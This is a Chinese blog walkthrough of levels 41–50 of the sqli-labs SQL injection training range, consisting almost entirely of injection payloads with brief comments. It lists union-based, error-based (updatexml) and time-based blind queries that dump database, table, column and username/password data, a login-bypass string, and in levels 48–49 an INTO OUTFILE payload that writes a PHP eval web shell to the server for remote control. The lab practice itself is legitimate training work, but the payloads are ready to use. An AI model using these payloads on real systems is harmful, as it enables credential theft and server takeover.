SQLi-labs靶场(41-50)过关超详细0基础

于 2024-07-30 11:48:24 发布
阅读量355 收藏 2
点赞数 8
分类专栏: sqli-labs 文章标签: 数据库 oracle sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67803321/article/details/140792854
版权

第四十一关

与前面几关一致存在联合查询,或者堆叠注入

这一关不需要闭合

?id=-1 union select 1,2,3--+

?id=-1 union select 1,2,database()--+

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

?id=-1 union select 1,2,group_concat(username,password) from users--+

过关

第四十二关

熟悉的登录界面,但是这次下面的忘记密码和创建账号的选项都无法使用

方法一:万能密码

直接在密码处输入

1'or '1'='1

方法二:

在密码处输入1'后,发现存在报错信息

可以尝试报错注入

1' or updatexml(1,concat(0x7e,database(),0x7e),1)

爆库

1' or  updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

1' or  updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),110,31),0x7e),1)--+

爆列

1' or  updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

爆字段

获取到了信息

过关

第四十三关

在密码处输入1',得到以下报错

判断闭合位1')

报错注入,与上题一样

1')or updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆库

1')or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

1')or updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)--+

爆列

1')or updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

爆字段

获取全部字段后

过关

第四十四关

这一关注入没有报错信息,无法使用报错注入了

先使用万能密码

万能密码还是能用

再尝试使用盲注

经过尝试,需要输入正确的账号密码才能进行注入

Dumb' and if (length(database()) = 8 ,sleep(4),1)--+

确定数据库长度

Dumb' and if (substr(database(),1,1) = 's' ,sleep(4),1)--+ 

爆处数据库第一位是s,依次推出security

Dumb' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6,sleep(3),0) --+

确定数据库第一个表的字段长度

Dumb'and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))=117,sleep(3),1)--+

依次找到users

Dumb'and if(length(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1))=7,sleep(3),1)--+

确定users下第一个列字段长度为7

Dumb'and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))=117,sleep(3),1)--+

第一个列第一个字符是u

依次推出全部的列

Dumb'and if(length(substr((select username from users limit 0,1),1))=4,sleep(3),1)--+

确定username下第一字段有4个字符

Dumb'and if(ascii(substr((select username from users limit 0,1),1,1))=68,sleep(3),1)--+

确定username第一个字段第一个字符是D

依次推出全部的账号密码信息

过关

第四十五关

这题与四十四题一样,但是')闭合

Dumb') and if(length(database())=8,sleep(2),0)--+

确定数据库字符长度

Dumb') and if(substr(database(),1,1)='s',sleep(2),0)--+

确定数据库名第一个字符是s,依次推处security

Dumb') and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=6,sleep(2),0)--+

确定数据库第一个表字符长度

Dumb') and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()limit 3,1),1,1))=117,sleep(2),0)--+

依次找到users

Dumb') and if(length(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1))=7,sleep(2),0)--+

确定users下第一个列的字段长度为7

Dumb') and if(ascii(substr((select column_name from information_schema.columns where table_name='users'limit 0,1),1))=117,sleep(2),0)--+

确定users下第一个列的第一个字符是u

依次推出全部的列名

Dumb') and if(length(substr((select username from users limit 0,1),1))=4,sleep(2),0)--+

确定username下第一个字段有4个字符

Dumb') and if(ascii(substr((select username from users limit 0,1),1))=68,sleep(2),0)--+

第一个字符是D

依次推出全部的账号密码信息

过关

第四十六关

提示我们使用数字形式输入sort

代码中使用的ORDER BY ,后面不能使用union select

?sort=1    不用闭合


?sort=1 asc  升序

?sort=1 desc  倒序

?sort=1

存在报错信息,可以使用报错注入

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)--+

爆库

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

爆表

?sort=1 and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users'limit 12,1),0x7e),1)--+

爆列

?sort=1 and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1)--+

爆字段

依次获取全部的账号密码信息,过关

第四十七关

?sort=1'--+

这关与46一样,但是单引号闭合

?sort=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

#爆库

?sort=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+

#爆表

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)--+

#爆列

?sort=1' and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)--+

#爆字段

依次获取全部的账号密码信息

过关

第四十八关

?sort=1"

这一关关闭了报错信息

不能使用报错注入

可以尝试注入后门

http://sqli-labs:8888/Less-2/?id=-1 union select 1,@@basedir,@@datadir

首先到第二关获取相关路径

?sort=1 into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-48\\1.php" lines terminated by '<?php phpinfo();?>'

先尝试phpinfo看看能否上传成功

?sort=1 into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-48\\111.php" lines terminated by '<?php @eval($_POST[admin]);?>'

上传后门

启动蚁剑

连接成功

过关

第四十九关

与48关一样,但是单引号闭合

?sort=1' into outfile "C:\\phpstudy_pro\\WWW\\sqli-labs\\Less-49\\1.php" lines terminated by '<?php @eval($_POST[admin]);?>'--+

注入后门

连接蚁剑

过关

第五十关

?sort=1'

无闭合,且存在报错信息,可以使用报错注入

?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

爆库

?sort=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)

爆表

?sort=1 and updatexml(1,concat(0x7e,mid((select group_concat(column_name) from information_schema.columns where table_name='users'),120,31),0x7e),1)

爆列

?sort=1 and updatexml(1,concat(0x7e,mid((select group_concat(username,password) from users),1,31),0x7e),1)

爆字段

获取全部的账号密码信息

过关

括弧

这关使用了mysql_multi_query函数,可以使用堆叠注入

YopFy
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1516
Sqli-labs靶场详细攻略
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1251
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
Sqli-labs-master靶场1-20通关教程
weixin_68416970的博客
05-29 1045
Sqli-labs-master靶场1-20通关教程
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
数据库查询与操作指南-以Nebula图数据库为例
DZSpace,专注于计算机科学与技术领域的技术博主,致力于分享实用知识与技巧,帮助读者快速掌握技术要点,共同探索计算机世界的无限可能。欢迎访问DZSpace的博客,一起学习进步!
07-26 310
数据库查询与操作指南-以Nebula图数据库为例
ODBC连接达梦数据库
qq_55187735的博客
07-24 296
用户执行,因为环境变量配置在。
SQL基础入门:解锁数据库管理的钥匙
WayneYalejk的博客
07-26 460
在数字化时代,数据已成为企业最宝贵的资产之一。为了高效地存储、查询和管理这些数据,SQL(Structured Query Language,结构化查询语言)应运而生。SQL不仅是数据库管理员的必备技能,也是数据分析师、开发人员等多个领域从业者的重要工具。本文将带您踏入SQL的世界,从基础概念到实际应用,一步步解锁数据库管理的钥匙。强调SQL在数据处理和分析中的重要性,鼓励读者通过实践不断深化对SQL的理解和应用。
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 245
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1267
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
添加索引导致微服务异常
07-29 484
执行DDL时,最好使用ONLINE选项,随着oracle版本升级,online状态下可执行的DDL逐步增加,大部分普通DDL上,可以使用ONLINE选项,例如。而在新增索引的时候会有TM锁,而该表又有大量的insert、update等,因此会对这些dml语句造成阻塞。1、对大表新增索引尽量停业务,就算加上online不会造成阻塞,但对性能也有影响,特别是这种性能敏感的系统。2、在新增索引的时候加online参数,而online产生的TM锁时间比较短。加了online后,可以以非独占的方式创建和删除索引。
教务管理平台/高校教务管理系统的设计与实现/教务网站/学生成绩管理系统/学生课程管理系统
weixin_47958760的博客
07-27 785
本毕业设计的内容是设计并且实现一个基于JSP技术的教务管理平台。采用MYSQL数据库开发平台,SSM框架,Tomcat网络信息服务作为应用服务器。教务管理平台的功能已基本实现,主要有学生、教师、课程信息、课程选择、教师课表、学生成绩、图书信息、考试等管理功能。 论文主要从系统的分析与设计 、数据库设计和系统的详细设计等几个方面来进行论述,系统分析与设计部分主要论述了系统的功能分析、系统的设计思路,数据库设计主要论述了数据库的设计,系统的详细设计部分主要论述了几个主要模块的详细设计过程。
Springboot使用Dynamic-Datasource配置多数据源
最新发布
shenxiaomo1688的博客
07-29 733
grace-destroy: false #是否优雅关闭数据源,默认为false,设置为true时,关闭数据源时如果数据源中还存在活跃连接,至多等待10s后强制关闭。driver-class-name: com.mysql.jdbc.Driver # 3.2.0开始支持SPI可省略此配置。strict: false #严格匹配数据源,默认false. true未匹配到指定数据源时抛异常,false使用默认数据源。primary: master #设置默认的数据源或者数据源组,默认值即为master。
【MySQL进阶之路 | 高级篇】简述Bin Log日志
2301_80912559的博客
07-27 869
binlog即binary log,二进制日志文件,也叫作变更日志(update log)。二进制日志可以通过数据库的全量备份和二进制日志中保存的增量信息,完成数据库的无损失恢复I但是,如果遇到数据量大、数据库和数据表很多(比如分库分表的应用)的场景,用二进制日志进行数据恢复,是很有挑战性的,因为起止位置不容易管理。在这种情况下,一个有效的解决办法是配置主从数据库服务器,甚至是一主多从的架构,把二进制日志文件的内容通过中继日志,同步到从数据库服务器中,这样就可以有效避免数据库故障导致的数据异常等问题。
使用abpcli创建项目时提示数据库迁移失败
qq_43893277的博客
07-28 167
使用abpcli创建项目时提示数据库迁移失败!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值